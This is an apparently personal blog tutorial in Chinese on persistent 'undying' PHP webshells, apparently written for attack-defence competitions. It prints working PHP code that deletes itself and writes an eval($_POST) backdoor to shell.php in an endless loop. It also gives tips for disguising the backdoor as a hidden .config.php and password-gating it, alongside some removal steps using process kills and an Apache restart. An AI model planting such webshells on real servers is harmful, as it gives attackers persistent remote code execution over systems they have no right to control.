不死马
不死马感觉挺有用的,先了解了解,早晚会用到
先来了解下不死马“不死”的原理
不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木马文件
来看一个普通的不死马
<?php set_time_limit(0); //用来让这个php文件能永久执行,否则会有超时时间 ignore_user_abort(1); //让客户端只连接一次就能一直运行,否则客户端关闭页面就会停止 unlink(__FILE__); //把自身文件删除 while (1) { $content = '<?php @eval($_POST["cmd"]); ?>';//设置一句话 file_put_contents("shell.php", $content); //将一句话写入到文件中 usleep(10000); //间隔时间 } ?>
这里的usleep的单位很离谱
现在上虚拟机里试试
写好后这边访问一下,可以看到1.php不见了,shell.php被创建了,而且删不掉
那该怎么删呢
最方便的应该是这样吧:
直接写个脚本删除同时创建相同名称文件夹(整完想起来直接用&&执行命令不是更快)
网页这边能够看到效果:
但是这个进程依旧是存在的,在1.php这里能够看到它依然在不断尝试写马
网上用的命令是这样的:ps aux|grep www-data|awk '{print 2}'| xargs kill -9
杀死所有www的进程,但是不知道为什么用了之后还是不好使,最后重启了下apache好了:apache2 restart
也不知道php执行脚本执行到哪去了,在ps里没看到,可能是在这几个www 的里面
就是不知道为什么杀进程不好使,待会再研究
到这里大概了解了普通的不死马原理以及一般的防护手段,下面就应该对它进行一些改造
首先就是把要写的一句话的文件名伪装起来,比如常用的有伪装成.config.php的
不加-a看不到,而且名字也能有些迷惑性,或者其他一些看起来比较有迷惑性的名称
然后是防止其他队搭顺风车的手段
比如这里在连接的时候需要加个?passwd=shell
这里顺带说一嘴md5,它是无法被还原出明文的,因为它是一种摘要算法
它会将任何长度的字符串通过计算后转化成固定长度的字符串,不管你的小电影有几百个T都一样(乐)
而验证的方式就是再计算一边,如果两个结果对上了那就通过了
不过即使是这种方式如果密码设置的太简单也经常会遭重
看这第一位很大可能是对的
具体的可以看看这篇文章:https://blog.csdn.net/qq_35387940/article/details/129749096
然后应该就剩下一句话本身的变形了,这个跟不死马关系不大,就不在这写了